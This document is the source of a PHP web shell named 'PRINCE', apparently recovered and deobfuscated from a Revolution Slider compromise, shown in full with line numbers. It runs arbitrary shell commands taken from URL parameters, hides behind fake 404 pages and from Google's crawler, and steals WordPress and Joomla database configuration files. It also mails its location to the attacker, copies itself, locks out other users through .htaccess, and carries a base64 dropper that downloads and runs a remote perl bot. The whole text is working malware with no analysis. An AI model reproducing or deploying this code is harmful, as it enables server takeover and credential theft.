Revslider deobfuscated - 27/10/2016

1. <style type="text/css">
2.     <!--
3.     body {
4.         background-color: #000000;
5.         background-image: url();
6.         background-repeat: no-repeat;
7.     }
8.     body,td,th {
9.         font-size: 14px;
10.         color: #FF0000;
11.         font-family: Times New Roman, Times, serif;
12.     }
13.     -->
14. </style>
15. <?php
16. error_reporting(0);
17. set_time_limit(0);
18. class PRINCE
19.  
20.     {
21.     private $access = array(
22.         'www-data',
23.         'www',
24.         'apache'
25.     );
26.     private $type, $os, $user;
27.     public
28.  
29.     function __construct()
30.         {
31.         $this->user = get_current_user();
32.         $this->os = $this->check("os");
33.         $this->type = $this->check("cmd");
34.         if (!isset($_GET['666']))
35.             {
36.             if (isset($_GET['x1']))
37.                 {
38.                 $this->form();
39.                 echo ($this->os == "windows") ? '<pre>' . $this->exe('dir') . '</pre>' : '<pre>' . $this->exe('ls -la') . '</pre>';
40.                 }
41.               else
42.                 {
43.                 header("HTTP/1.0 404 Not Found");
44.                 header("Status: 404 Not Found");
45.                 echo "<h1>Error 404 Not Found</h1>";
46.                 echo "The page that you have requested could not be found.";
47.                 die();
48.                 exit();
49.                 }
50.             }
51.           else
52.             {
53.             if (isset($_GET['x']))
54.                 {
55.                 switch ($_GET['x'])
56.                     {
57.                 case 'get':
58.                     if (isset($_GET['file']))
59.                         {
60.                         $file = urldecode($_GET['file']);
61.                         $name = (isset($_GET['name'])) ? $_GET['name'] : "px.php";
62.                         $code = file_get_contents($file);
63.                         $myfile = fopen($name, "w+");
64.                         fwrite($myfile, $code);
65.                         fclose($myfile);
66.                         }
67.  
68.                     break;
69.  
70.                 case 'plbot':
71.                     $this->plBot();
72.                     break;
73.  
74.                 case 'clear':
75.                     $this->delete("px.php");
76.                     $this->delete("pl.php");
77.                     break;
78.  
79.                 case 'read':
80.                     if (isset($_GET['path']))
81.                         {
82.                         $path = urldecode($_GET['path']);
83.                         $this->setDB($path);
84.                         }
85.  
86.                     break;
87.  
88.                 case 'jdb':
89.                     $this->joomlaDb();
90.                     break;
91.  
92.                 case 'wpdb':
93.                     $this->wpDb();
94.                     break;
95.  
96.                 case 'mail':
97.                     $mail = (isset($_GET['to'])) ? urldecode($_GET['to']) : "[email protected]";
98.                     $host = $_SERVER["HTTP_HOST"];
99.                     $uri = $_SERVER["REQUEST_URI"];
100.                     $serv = gethostbyname($_SERVER['SERVER_ADDR']);
101.                     $addr = gethostbyname($_SERVER['REMOTE_ADDR']);
102.                     mail($mail, "kiriman bos " . $host . $uri, "Url:" . $host . $uri . " \nIp :$serv\n Ip injector: $addr");
103.                     break;
104.  
105.                 case 'clone':
106.                     if (isset($_GET['path']))
107.                         {
108.                         $path = urldecode($_GET['path']);
109.                         if (strstr($path, ","))
110.                             {
111.                             $data = explode(",", $path);
112.                             if (is_array($data) && count($data) > 0)
113.                                 {
114.                                 $data = array_filter($data);
115.                                 if (count($data) > 0)
116.                                     {
117.                                     foreach($data as $k)
118.                                         {
119.                                         $this->setClone($k);
120.                                         }
121.                                     }
122.                                 }
123.                             }
124.                           else
125.                             {
126.                             $path = urldecode($_GET['path']);
127.                             $this->setClone($path);
128.                             }
129.                         }
130.                       else
131.                         {
132.                         $this->setClone('../.inc.php');
133.                         $this->setClone('../../.inc.php');
134.                         }
135.  
136.                     break;
137.  
138.                 case 'patch':
139.                     $lock = (isset($_GET['lock'])) ? 1 : 0;
140.                     $force = (isset($_GET['force'])) ? 1 : 0;
141.                     $path = "";
142.                     if (isset($_GET['path']))
143.                         {
144.                         $path = urldecode($_GET['path']);
145.                         if (strstr($path, ","))
146.                             {
147.                             $path = explode(",", $path);
148.                             }
149.                         }
150.  
151.                     if (isset($_GET['allow']))
152.                         {
153.                         $files = urldecode($_GET['allow']);
154.                         if (strstr($files, ","))
155.                             {
156.                             $file = explode(",", $files);
157.                             $this->setPatch($user, $file, $lock, $path, $force);
158.                             }
159.                           else
160.                             {
161.                             $this->setPatch($user, $files, $lock, $path, $force);
162.                             }
163.                         }
164.                       else
165.                         {
166.                         $this->setPatch($user, "", $lock, $path, $force);
167.                         }
168.  
169.                     break;
170.  
171.                 case 'chmod':
172.                     if (isset($_GET['dir']))
173.                         {
174.                         $dir = $_GET['dir'];
175.                         if ($dir == 1)
176.                             {
177.                             chmod("./", 0555);
178.                             }
179.                           else
180.                         if ($dir == 2)
181.                             {
182.                             chmod("./", 0555);
183.                             chmod("../", 0555);
184.                             }
185.                           else
186.                         if ($dir == 3)
187.                             {
188.                             chmod("./", 0555);
189.                             chmod("../", 0555);
190.                             chmod("../../", 0555);
191.                             }
192.                           else
193.                             {
194.                             $dir = str_replace("|", "/", $dir);
195.                             chmod($dir, 0555);
196.                             }
197.                         }
198.  
199.                     break;
200.  
201.                 case 'die':
202.                     $source = $_SERVER['SCRIPT_FILENAME'];
203.                     @unlink($source);
204.                     break;
205.                     }
206.                 }
207.               else
208.                 {
209.                 if (isset($_GET['del']))
210.                     {
211.                     $del = $_GET['del'];
212.                     if (strstr($del, ","))
213.                         {
214.                         $data = explode(",", $del);
215.                         if (is_array($data) && count($data) > 0)
216.                             {
217.                             $data = array_filter($data);
218.                             foreach($data as $k)
219.                                 {
220.                                 $this->delete($k);
221.                                 }
222.                             }
223.                         }
224.                       else
225.                         {
226.                         $this->delete($del);
227.                         }
228.                     }
229.  
230.                 $this->getForm();
231.                 }
232.             }
233.         }
234.  
235.     private
236.     function plBot()
237.         {
238.         $code = "PD9waHANCiR1cmwgPSAoaXNzZXQoJF9HRVRbJ3VybCddKSkgPyB1cmxkZWNvZGUoJF9HRVRbJ3VybCddKSA6ICJodHRwOi8vd3d3LmZpbGFybW9uaWNhcG9yZGVub25lLml0L3BsdWdpbnMvYWN5bWFpbGluZy9jb250ZW50cGx1Z2luL2JvdC50eHQiOw0KDQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQoJQGV4ZWMoJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjdXJsICcuJHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnbHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ0dFVCAnLiR1cmwuJyA+cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdybSAtcmYgcm9iKi50eHQnKTsNCglAZXhlYygnY2QgL3RtcDt3Z2V0ICcuJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnY2QgL3RtcDtjdXJsICcuJHVybC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO2x3cC1kb3dubG9hZCAtYSAnLiR1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7bHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnY2QgL3RtcDtHRVQgJy4kdXJsLicgPnJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygncm0gLXJmIGluZGV4LnBocC4qJyk7DQoJQGV4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO3JtIC1yZiByb2IqLnR4dConKTsNCglAZXhlYygncm0gLXJmIHJvYioudHh0KicpOw0KfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KCUBzaGVsbF9leGVjKCd3Z2V0ICcuJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY3VybCAnLiR1cmwuJyAtbyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2x3cC1kb3dubG9hZCAtYSAnLiR1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2x5bnggLXNvdXJjZSAnLiR1cmwuJyA+IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVybC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdHRVQgJy4kdXJsLicgPnJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygncm0gLXJmIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7d2dldCAnLiR1cmwuJyAtTyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7Y3VybCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtsd3AtZG93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjZCAvdG1wO2x5bnggLXNvdXJjZSAnLiR1cmwuJyA+IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7R0VUICcuJHVybC4nID5yb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7cm0gLXJmIGluZGV4LnBocC4qJyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjZCAvdG1wO3JtIC1yZiByb2IqLnR4dConKTsNCglAc2hlbGxfZXhlYygncm0gLXJmIHJvYioudHh0KicpOw0KfWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCglAc3lzdGVtKCd3Z2V0ICcuJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjdXJsICcuJHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdsd3AtZG93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2x5bnggLXNvdXJjZSAnLiR1cmwuJyA+IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnR0VUICcuJHVybC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2NkIC90bXA7d2dldCAnLiR1cmwuJyAtTyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3RtcDtjdXJsICcuJHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2x3cC1kb3dubG9hZCAtYSAnLiR1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3RtcDtseW54IC1zb3VyY2UgJy4kdXJsLicgPiByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3RtcDtmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3RtcDtHRVQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3Zhci90bXA7cm0gLXJmIGluZGV4LnBocC4qJyk7DQoJQHN5c3RlbSgnY2QgL3RtcDtybSAtcmYgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO3JtIC1yZiByb2IqLnR4dConKTsNCn0gZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7DQoJQHBhc3N0aHJ1KCd3Z2V0ICcuJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnbHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2x5bnggLXNvdXJjZSAnLiR1cmwuJyA+IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJyA7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdHRVQgJy4kdXJsLicgPnJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY2QgL3RtcDt3Z2V0ICcuJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7Y3VybCAnLiR1cmwuJyAtbyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO2x3cC1kb3dubG9hZCAtYSAnLiR1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO2x5bnggLXNvdXJjZSAnLiR1cmwuJyA+IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7ZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVybC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY2QgL3RtcDtHRVQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdybSAtcmYgaW5kZXgucGhwLionKTsNCglAcGFzc3RocnUoJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgncm0gLXJmIHJvYioudHh0KicpOw0KfQ0KPz4=";
239.         $code2 = base64_decode($code);
240.         $myfile = fopen("pl.php", "w+");
241.         fwrite($myfile, $code2);
242.         fclose($myfile);
243.         }
244.  
245.     private
246.     function check($tipe)
247.         {
248.         if ($tipe == "cmd")
249.             {
250.             $result = 0;
251.             if (function_exists('passthru'))
252.                 {
253.                 $result = "passthru";
254.                 }
255.             elseif (function_exists('system'))
256.                 {
257.                 $result = "system";
258.                 }
259.             elseif (function_exists('exec'))
260.                 {
261.                 $result = "exec";
262.                 }
263.             elseif (function_exists('shell_exec'))
264.                 {
265.                 $result = "shell_exec";
266.                 }
267.             }
268.           else
269.             {
270.             $result = "linux";
271.             if (PHP_OS == "WINNT")
272.                 {
273.                 $result = "windows";
274.                 }
275.             elseif (PHP_OS == "Linux")
276.                 {
277.                 $result = "linux";
278.                 }
279.             elseif (PHP_OS == "FreeBSD")
280.                 {
281.                 $result = "freebsd";
282.                 }
283.             }
284.  
285.         return $result;
286.         }
287.  
288.     private
289.     function getForm()
290.         {
291.         $this->form();
292.         if (isset($_GET['u']))
293.             {
294.             echo "<form enctype=multipart/form-data action method=POST><b>Upload File</b><br/><input type=hidden name=submit><input type=file name=userfile size=28><br /><b>New name: </b><input type=text size=15 name=newname class=ta><input type=submit class=bt value=Upload></form>";
295.             $this->processForm();
296.             $this->cmd();
297.             }
298.           else
299.             {
300.             $this->cmd();
301.             }
302.         }
303.  
304.     private
305.     function form()
306.         {
307.         if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']) , 'google') !== false)
308.             {
309.             header('HTTP/1.0 404 Not Found');
310.             echo "<h1>Error 404 Not Found</h1>";
311.             echo "The page that you have requested could not be found.";
312.             exit();
313.             }
314.  
315.         $safe = @ini_get('safe_mode');
316.         $secure = (!$safe) ? "SAFE_MODE : OFF" : "SAFE_MODE : ON";
317.         echo "<body style='background:#000000;color:#00CC00;font-family:monospace;font-size:13px;'>";
318.         echo "<title>P R I N C E</title><br />";
319.         echo "<b>" . $secure . "</b><br />";
320.         $cur_user = "(" . $this->user . ")";
321.         echo "<b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br />";
322.         echo "<b>Uname : " . php_uname() . "</b><br/>";
323.         }
324.  
325.     private
326.     function processForm()
327.         {
328.         if (isset($_POST['submit']))
329.             {
330.             $uploaddir = $this->pwd();
331.             if (!$name = $_POST['newname'])
332.                 {
333.                 $name = $_FILES['userfile']['name'];
334.                 }
335.  
336.             move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
337.             echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" : "Success Upload to " . $uploaddir . $name;
338.             }
339.         }
340.  
341.     private
342.     function pwd()
343.         {
344.         $cwd = getcwd();
345.         if ($u = strrpos($cwd, '/'))
346.             {
347.             return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd;
348.             }
349.         elseif ($u = strrpos($cwd, '\/'))
350.             {
351.             if ($u != strlen($cwd) - 1)
352.                 {
353.                 return $cwd . '\/';
354.                 }
355.               else
356.                 {
357.                 return $cwd;
358.                 }
359.             }
360.         }
361.  
362.     private
363.     function cmd($cmd = false)
364.         {
365.         if ($cmd)
366.             {
367.             echo '<pre>' . $this->exe($cmd) . '</pre>';
368.             }
369.           else
370.             {
371.             if (isset($_GET['q']))
372.                 {
373.                 echo '<pre>' . $this->exe($_GET['q']) . '</pre>';
374.                 }
375.               else
376.                 {
377.                 echo ($this->os == "windows") ? '<pre>' . $this->exe('dir') . '</pre>' : '<pre>' . $this->exe('ls -la') . '</pre>';
378.                 }
379.             }
380.         }
381.  
382.     private
383.     function exe($cmd)
384.         {
385.         $res = '';
386.         if ($this->type == "exec")
387.             {
388.             @exec($cmd, $res);
389.             $res = join("\n", $res);
390.             }
391.         elseif ($this->type == "shell_exec")
392.             {
393.             $res = @shell_exec($cmd);
394.             }
395.         elseif ($this->type == "system")
396.             {
397.             @ob_start();
398.             @system($cmd);
399.             $res = @ob_get_contents();
400.             @ob_end_clean();
401.             }
402.         elseif ($this->type == "passthru")
403.             {
404.             @ob_start();
405.             @passthru($cmd);
406.             $res = @ob_get_contents();
407.             @ob_end_clean();
408.             }
409.  
410.         return $res;
411.         }
412.  
413.     private
414.     function setPatch($user, $data, $lock, $path, $force)
415.         {
416.         $create = 1;
417.         if (!$force)
418.             {
419.             if (in_array($user, $this->access))
420.                 {
421.                 $create = 0;
422.                 }
423.             }
424.  
425.         if ($create)
426.             {
427.             if ($lock)
428.                 {
429.                 $i = 'deny from all' . PHP_EOL;
430.                 }
431.               else
432.                 {
433.                 $i = '<Files ~ "(?i)\.(zip|rar|php|php.*|phtml|gif|png|phpgif|asp|asp.*)$">' . PHP_EOL;
434.                 $i.= 'deny from all' . PHP_EOL;
435.                 $i.= '</Files>' . PHP_EOL;
436.                 }
437.  
438.             if (is_array($data))
439.                 {
440.                 foreach($data as $k)
441.                     {
442.                     $i.= '<Files "' . $k . '">' . PHP_EOL;
443.                     $i.= 'Order Allow,Deny' . PHP_EOL;
444.                     $i.= 'Allow from all' . PHP_EOL;
445.                     $i.= '</Files>' . PHP_EOL;
446.                     }
447.                 }
448.               else
449.                 {
450.                 if (!empty($data))
451.                     {
452.                     $i.= '<Files "' . $data . '">' . PHP_EOL;
453.                     $i.= 'Order Allow,Deny' . PHP_EOL;
454.                     $i.= 'Allow from all' . PHP_EOL;
455.                     $i.= '</Files>' . PHP_EOL;
456.                     }
457.                   else
458.                     {
459.                     $i.= '<Files "visa.php">' . PHP_EOL;
460.                     $i.= 'Order Allow,Deny' . PHP_EOL;
461.                     $i.= 'Allow from all' . PHP_EOL;
462.                     $i.= '</Files>' . PHP_EOL;
463.                     $i.= '<Files "version.php">' . PHP_EOL;
464.                     $i.= 'Order Allow,Deny' . PHP_EOL;
465.                     $i.= 'Allow from all' . PHP_EOL;
466.                     $i.= '</Files>' . PHP_EOL;
467.                     }
468.                 }
469.  
470.             if (is_array($path))
471.                 {
472.                 foreach($path as $k)
473.                     {
474.                     $file = fopen($k, "w");
475.                     fwrite($file, $i);
476.                     fclose($file);
477.                     }
478.                 }
479.               else
480.                 {
481.                 if (!empty($path))
482.                     {
483.                     $file = fopen($path, "w");
484.                     fwrite($file, $i);
485.                     fclose($file);
486.                     }
487.                   else
488.                     {
489.                     $file = fopen(".htaccess", "w");
490.                     fwrite($file, $i);
491.                     fclose($file);
492.                     }
493.                 }
494.             }
495.         }
496.  
497.     private
498.     function setDB($file)
499.         {
500.         $read = file_get_contents($file);
501.         if ($read)
502.             {
503.             echo $read;
504.             }
505.           else
506.             {
507.             echo "Unable to open file";
508.             }
509.  
510.         exit;
511.         }
512.  
513.     private
514.     function setClone($path)
515.         {
516.         if (file_exists($path))
517.             {
518.             @unlink($path);
519.             }
520.  
521.         $source = $_SERVER['SCRIPT_FILENAME'];
522.         copy($source, $path);
523.         }
524.  
525.     private
526.     function joomlaDb()
527.         {
528.         $p1 = "../../../../../../../";
529.         $p2 = "../../../../../../";
530.         $p3 = "../../../../../";
531.         $p4 = "../../../../";
532.         $p5 = "../../../";
533.         $p6 = "../../";
534.         $p7 = "../";
535.         $j = file_get_contents($p1 . "configuration.php");
536.         if (!$j)
537.             {
538.             $j = file_get_contents($p2 . "configuration.php");
539.             if (!$j)
540.                 {
541.                 $j = file_get_contents($p3 . "configuration.php");
542.                 if (!$j)
543.                     {
544.                     $j = file_get_contents($p4 . "configuration.php");
545.                     if (!$j)
546.                         {
547.                         $j = file_get_contents($p5 . "configuration.php");
548.                         if (!$j)
549.                             {
550.                             $j = file_get_contents($p6 . "configuration.php");
551.                             if (!$j)
552.                                 {
553.                                 $j = file_get_contents($p7 . "configuration.php");
554.                                 if (!$j)
555.                                     {
556.                                     $j = file_get_contents("configuration.php");
557.                                     }
558.                                 }
559.                             }
560.                         }
561.                     }
562.                 }
563.             }
564.  
565.         echo $j;
566.         exit;
567.         }
568.  
569.     private
570.     function wpDb()
571.         {
572.         $p1 = "../../../../../../../";
573.         $p2 = "../../../../../../";
574.         $p3 = "../../../../../";
575.         $p4 = "../../../../";
576.         $p5 = "../../../";
577.         $p6 = "../../";
578.         $p7 = "../";
579.         $w = file_get_contents($p1 . "wp-config.php");
580.         if (!$w)
581.             {
582.             $w = file_get_contents($p2 . "wp-config.php");
583.             if (!$w)
584.                 {
585.                 $w = file_get_contents($p3 . "wp-config.php");
586.                 if (!$w)
587.                     {
588.                     $w = file_get_contents($p4 . "wp-config.php");
589.                     if (!$w)
590.                         {
591.                         $w = file_get_contents($p5 . "wp-config.php");
592.                         if (!$w)
593.                             {
594.                             $w = file_get_contents($p6 . "wp-config.php");
595.                             if (!$w)
596.                                 {
597.                                 $w = file_get_contents($p7 . "wp-config.php");
598.                                 if (!$w)
599.                                     {
600.                                     $w = file_get_contents("wp-config.php");
601.                                     }
602.                                 }
603.                             }
604.                         }
605.                     }
606.                 }
607.             }
608.  
609.         echo $w;
610.         exit;
611.         }
612.  
613.     private
614.     function delete($file)
615.         {
616.         chmod("./", 0755);
617.         chmod("../", 0755);
618.         chmod("../../", 0755);
619.         @unlink($this->pwd() . $file);
620.         $this->exe('rm -rf ' . $file);
621.         $this->exe('del ' . $file);
622.         }
623.     }
624.  
625. new PRINCE();